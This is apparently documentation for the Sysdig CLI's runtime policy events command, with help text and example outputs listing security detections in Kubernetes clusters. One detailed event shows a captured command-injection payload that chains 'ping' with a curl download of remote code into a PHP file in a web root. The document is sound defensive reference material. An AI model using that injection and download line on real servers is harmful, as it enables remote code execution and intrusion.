Sysdig Platform CLI - Runtime Policies Events
This section explains concepts and notations in the set of the Secure Runtime Policy Events commands provided.
Usage
The runtime policy events section allows the user to retrieve all the policy violation events, as well as image scanning violation events using the CLI, and contains the following options:
$ sdc-cli policy events --help
Usage: sdc-cli policy events [OPTIONS] [EVENT_ID]
Options:
--duration TEXT Duration to display the events from. The minimum is 10
minutes. (ex: 30M, 1H, 3D, 2W). Default 3D.
--scope TEXT this is a Sysdig Monitor-like filter (e.g
'kubernetes.cluster.name in ("prod", "dev")'). When
provided, events are filtered by their scope, so only a
subset will be returned (e.g.
'container.image.repo="ubuntu"' will provide only events
that have happened on an ubuntu container).
--severity TEXT Filter by severity. Valid ones are: 'high', 'med', 'low',
'info'. Multiple ones can be specified if separated by
commas. (e.g. 'med,low,info')
--type TEXT Filter by event originator. Valid ones are: 'scanning',
'policy'. Multiple ones can be specified if separated by
commas. (e.g. 'scanning,policy')
--search TEXT Search by event title or label
--limit INTEGER Limit the amount of events retrieved. Default: 50
--help Show this message and exit.
Example: Retrieve all the events in the last 3 days (Default behavior)
$ sdc-cli policy events
id name severity type date
164a1efbd97c97ed366d946511fd9e28 Terminal shell in container HIGH policy 2020-11-23 11:18:04 UTC
164a1ec3f9e5a15ffb6a46a65184b58e Launch Suspicious Network Tool in Container MED policy 2020-11-23 11:14:04 UTC
164a1bd329805200bdc62af13ba144fb Ingress Object Without TLS Cert Created LOW policy 2020-11-23 10:20:10 UTC
164a14ff18ad1b008e4c6c167b65cecf Create/Modify Configmap With Private Credentials HIGH policy 2020-11-23 08:15:02 UTC
164a0d5d70051dc9cf79e61657460c82 Access Cryptomining Network HIGH policy 2020-11-23 05:55:12 UTC
164a0d5d6a4bf8dd1b5da9e35168e3b9 Access Cryptomining Network HIGH policy 2020-11-23 05:55:11 UTC
164a0d5d55825ecf8f90976340313343 Access Cryptomining Network HIGH policy 2020-11-23 05:55:11 UTC
1649f775c744549151a394645659f21c Unscanned Image - k8s.gcr.io/metrics-server-amd64:v0.3.6 MED scanning 2020-11-22 23:13:47 UTC
1649f775c729d548f10545b71c590bea Unscanned Image - gke.gcr.io/k8s-dns-dnsmasq-nanny-amd64:1.15.13 MED scanning 2020-11-22 23:13:47 UTC
1649f775c70de4d09f0d63633cc01cdf Unscanned Image - gke.gcr.io/k8s-dns-dnsmasq-nanny-amd64:1.15.13 MED scanning 2020-11-22 23:13:47 UTC
1649f72fe141e0c1b4828da46583eab6 Unscanned Image - k8s.gcr.io/ingress-gce-404-server-with-metrics-amd64:v1.6.0 MED scanning 2020-11-22 23:08:47 UTC
1649f65e84ef26346164e19e6fb9c4e1 Unscanned Image - gke.gcr.io/k8s-dns-sidecar-amd64:1.15.13 MED scanning 2020-11-22 22:53:47 UTC
1649f65e84d0267542d226ef875ef045 Unscanned Image - gke.gcr.io/k8s-dns-sidecar-amd64:1.15.13 MED scanning 2020-11-22 22:53:47 UTC
1649f58cd568a61360e226fa01904700 Unscanned Image - gke.gcr.io/addon-resizer:1.8.8-gke.1 MED scanning 2020-11-22 22:38:47 UTC
1649f4430c0cebace243051a3ac2fdbb Sensitive Info Exfiltration HIGH policy 2020-11-22 22:15:10 UTC
1649f12f3ff2e98d4ec479cba092d355 Unscanned Image - 9999999.dkr.ecr.us-east-1.amazonaws.com/amazon-k8s-cni:v1.5.4 MED scanning 2020-11-22 21:18:47 UTC
1649f12f3fcd5e0c0c54b1495a38485d Unscanned Image - 9999999.dkr.ecr.us-east-1.amazonaws.com/amazon-k8s-cni:v1.5.4 MED scanning 2020-11-22 21:18:47 UTC
1649ebffc8ddf8cc82aa4675a9f8c1e9 Unscanned Image - docker.io/protokube:1.17.0 MED scanning 2020-11-22 19:43:45 UTC
1649ebffc8c5f40a2a379079c0a9f327 Unscanned Image - docker.io/protokube:1.17.0 MED scanning 2020-11-22 19:43:45 UTC
1649ebffc8a77988c30145176d5050ad Unscanned Image - docker.io/protokube:1.17.0 MED scanning 2020-11-22 19:43:45 UTC
1649ebffc887b8991b08f685e450b54f Unscanned Image - docker.io/protokube:1.17.0 MED scanning 2020-11-22 19:43:45 UTC
1649ea5cf830ddf6464124d08f04f606 Unscanned Image - 9999999.dkr.ecr.us-east-1.amazonaws.com/eks/coredns:v1.3.1 MED scanning 2020-11-22 19:13:47 UTC
1649ea5cf81319e50f099c621efc05ba Unscanned Image - 9999999.dkr.ecr.us-east-1.amazonaws.com/eks/coredns:v1.3.1 MED scanning 2020-11-22 19:13:47 UTC
1649d067a438b1227948f4d50a88ffc3 Terminal shell in container HIGH policy 2020-11-22 11:18:05 UTC
1649d02f9c831e8f00770de4a0f05048 Launch Suspicious Network Tool in Container MED policy 2020-11-22 11:14:05 UTC
1649cd3ca0b15f0089821ebfd2178603 Ingress Object Without TLS Cert Created LOW policy 2020-11-22 10:20:02 UTC
1649c66b12f0a300d69bec3c2c9871c0 Create/Modify Configmap With Private Credentials HIGH policy 2020-11-22 08:15:05 UTC
1649bec6d2fad406fd0a0b982867a325 Access Cryptomining Network HIGH policy 2020-11-22 05:55:03 UTC
1649a5ae6d64e86477dbc151e3fd7ba3 Sensitive Info Exfiltration HIGH policy 2020-11-21 22:15:10 UTC
164981d3270cd0735c9daf4fd63c2783 Terminal shell in container HIGH policy 2020-11-21 11:18:06 UTC
1649819b3d26d40c9bab771b8816c07c Launch Suspicious Network Tool in Container MED policy 2020-11-21 11:14:05 UTC
16497ea826d27a009fc85c9c04d59f14 Ingress Object Without TLS Cert Created LOW policy 2020-11-21 10:20:02 UTC
164977d68e0c6c00c4916f6df64c99c1 Create/Modify Configmap With Private Credentials HIGH policy 2020-11-21 08:15:05 UTC
164975099c19932f6f7915cb45fd53d3 Unscanned Image - docker.io/sysdiglabs/cloud-connector:master MED scanning 2020-11-21 07:23:46 UTC
16497032b1adf7bae439b390a10d1272 Access Cryptomining Network HIGH policy 2020-11-21 05:55:05 UTC
16497032acabef4c64b261c8abac3ad7 Access Cryptomining Network HIGH policy 2020-11-21 05:55:05 UTC
1649703297555ffbbb26d86292158f5f Access Cryptomining Network HIGH policy 2020-11-21 05:55:04 UTC
16495719cebcbfef875e97ef70bba8b4 Sensitive Info Exfiltration HIGH policy 2020-11-20 22:15:10 UTC
16494d5669cd451de0f44661098cf845 AWS CloudTrail security event HIGH policy 2020-11-20 19:16:15 UTC
16494cd8af04d106ca46379d53acc0ac AWS CloudTrail security event HIGH policy 2020-11-20 19:07:15 UTC
Example: Retrieve only the events from the last 6 hours
$ sdc-cli policy events --duration 6H
id name severity type date
164a1efbd97c97ed366d946511fd9e28 Terminal shell in container HIGH policy 2020-11-23 11:18:04 UTC
Example: Retrieve only the last 5 policy violation events
$ sdc-cli policy events --type policy --limit 5
id name severity type date
164a1efbd97c97ed366d946511fd9e28 Terminal shell in container HIGH policy 2020-11-23 11:18:04 UTC
164a1ec3f9e5a15ffb6a46a65184b58e Launch Suspicious Network Tool in Container MED policy 2020-11-23 11:14:04 UTC
164a1bd329805200bdc62af13ba144fb Ingress Object Without TLS Cert Created LOW policy 2020-11-23 10:20:10 UTC
164a14ff18ad1b008e4c6c167b65cecf Create/Modify Configmap With Private Credentials HIGH policy 2020-11-23 08:15:02 UTC
164a0d5d70051dc9cf79e61657460c82 Access Cryptomining Network HIGH policy 2020-11-23 05:55:12 UTC
Example: Filter by name or description
$ sdc-cli policy events --search Terminal
id name severity type date
164a1efbd97c97ed366d946511fd9e28 Terminal shell in container HIGH policy 2020-11-23 11:18:04 UTC
1649d067a438b1227948f4d50a88ffc3 Terminal shell in container HIGH policy 2020-11-22 11:18:05 UTC
164981d3270cd0735c9daf4fd63c2783 Terminal shell in container HIGH policy 2020-11-21 11:18:06 UTC
Example: Retrieve only the last 8 high and medium severity events
$ sdc-cli policy events --severity high,med --limit 8
id name severity type date
164a1efbd97c97ed366d946511fd9e28 Terminal shell in container HIGH policy 2020-11-23 11:18:04 UTC
164a1ec3f9e5a15ffb6a46a65184b58e Launch Suspicious Network Tool in Container MED policy 2020-11-23 11:14:04 UTC
164a14ff18ad1b008e4c6c167b65cecf Create/Modify Configmap With Private Credentials HIGH policy 2020-11-23 08:15:02 UTC
164a0d5d70051dc9cf79e61657460c82 Access Cryptomining Network HIGH policy 2020-11-23 05:55:12 UTC
164a0d5d6a4bf8dd1b5da9e35168e3b9 Access Cryptomining Network HIGH policy 2020-11-23 05:55:11 UTC
164a0d5d55825ecf8f90976340313343 Access Cryptomining Network HIGH policy 2020-11-23 05:55:11 UTC
1649f775c744549151a394645659f21c Unscanned Image - k8s.gcr.io/metrics-server-amd64:v0.3.6 MED scanning 2020-11-22 23:13:47 UTC
1649f775c729d548f10545b71c590bea Unscanned Image - gke.gcr.io/k8s-dns-dnsmasq-nanny-amd64:1.15.13 MED scanning 2020-11-22 23:13:47 UTC
Example: Apply custom filtering
$ sdc-cli policy events --scope 'kubernetes.cluster.name="prod" and kubernetes.namespace.name="frontend"'
id name severity type date
1649f4430c0cebace243051a3ac2fdbb Sensitive Info Exfiltration HIGH policy 2020-11-22 22:15:10 UTC
1649a5ae6d64e86477dbc151e3fd7ba3 Sensitive Info Exfiltration HIGH policy 2020-11-21 22:15:10 UTC
16495719cebcbfef875e97ef70bba8b4 Sensitive Info Exfiltration HIGH policy 2020-11-20 22:15:10 UTC
Example: Retrieve more info from a policy event
$ sdc-cli policy events 1649f4430c0cebace243051a3ac2fdbb
id: 1649f4430c0cebace243051a3ac2fdbb
name: Sensitive Info Exfiltration
description: Web server accessing forbidden directory
date: 2020-11-22 22:15:10 UTC
type: policy
severity: HIGH
output: Writig to forbidden directory (user=www-data command=sh -c ping -c 3 localhost; curl https://gist.githubusercontent.com/bencer/9e32fb1af89754b4ad8346b13dcd1110/raw/cd79134f420b59e84e6b60be3bdff7ca0bb42f1e/gistfile1.txt > /var/www/html/dump.php file=/var/www/html/dump.php)
tags: filesystem
fields:
falco.rule Apache writing to non allowed directory
fd.name /var/www/html/dump.php
proc.cmdline sh -c ping -c 3 localhost; curl https://gist.githubusercontent.com/bencer/9e32fb1af89754b4ad8346b13dcd1110/raw/cd79134f420b59e84e6b60be3bdff7ca0bb42f1e/gistfile1.txt > /var/www/html/dump.php
proc.name sh
user.name www-data
labels:
agent.tag.role cluster
container.image.digest sha256:74941e12721385c8f3d5b9438294eae9050087badfc8c4c9e67195d098e40e11
container.image.id 5e8b2f0509f4
container.image.repo sysdiglabs/workshop-forensics-1-phpping
container.image.tag 0.1
container.label.io.kubernetes.container.name frontend
container.label.io.kubernetes.pod.name frontend-7588976944-b8tmm
container.label.io.kubernetes.pod.namespace frontend
container.name k8s_frontend_frontend-7588976944-b8tmm_frontend_77dcd8da-fac3-46d6-88cb-554557b8812c_0
host.hostName ip-172-20-42-99
host.mac 02:61:ce:1c:1d:29
kubernetes.cluster.name prod
kubernetes.deployment.name frontend
kubernetes.namespace.name frontend
kubernetes.node.name ip-172-20-42-99.ec2.internal
kubernetes.pod.name frontend-7588976944-b8tmm
kubernetes.replicaSet.name frontend-7588976944
kubernetes.service.name php
process.name sh -c ping -c 3 localhost; curl https://gist.githubusercontent.com/bencer/9e32fb1af89754b4ad8346b13dcd1110/raw/cd79134f420b59e84e6b60be3bdff7ca0bb42f1e/gistfile1.txt > /var/www/html/dump.php
Example: Retrieve more info from a scanning event
$ sdc-cli policy events 1649f775c729d548f10545b71c590bea
id: 1649f775c729d548f10545b71c590bea
name: Unscanned Image - gke.gcr.io/k8s-dns-dnsmasq-nanny-amd64:1.15.13
description:
date: 2020-11-22 23:13:47 UTC
type: scanning
severity: MED
output:
tags:
image:
digest sha256:1eba77c751b7b25c9af97c23c857f3a7024253224d256b8648b0d86cddda5074
id c84ca8f78ee6
registry gke.gcr.io
repo k8s-dns-dnsmasq-nanny-amd64
tag 1.15.13
labels:
agent.tag.cluster staging
agent.tag.role cluster
agent.tag.sysdig_secure.enabled true
container.image.repo gke.gcr.io/k8s-dns-dnsmasq-nanny-amd64
container.image.tag 1.15.13
container.label.io.kubernetes.container.name dnsmasq
container.label.io.kubernetes.pod.name kube-dns-869d587df7-8mfxn
container.label.io.kubernetes.pod.namespace kube-system
container.name k8s_dnsmasq_kube-dns-869d587df7-8mfxn_kube-system_2b3874ce-bc6a-439f-bcfb-82758ec6da55_0
host.hostName gke-staging-default-pool-f141e1d0-vsb0
host.ip.private 10.128.0.11, 169.254.123.1
host.ip.public
host.mac 42:01:0a:80:00:0b
kubernetes.cluster.name staging
kubernetes.deployment.name kube-dns
kubernetes.namespace.name kube-system
kubernetes.pod.name kube-dns-869d587df7-8mfxn
kubernetes.replicaSet.name kube-dns-869d587df7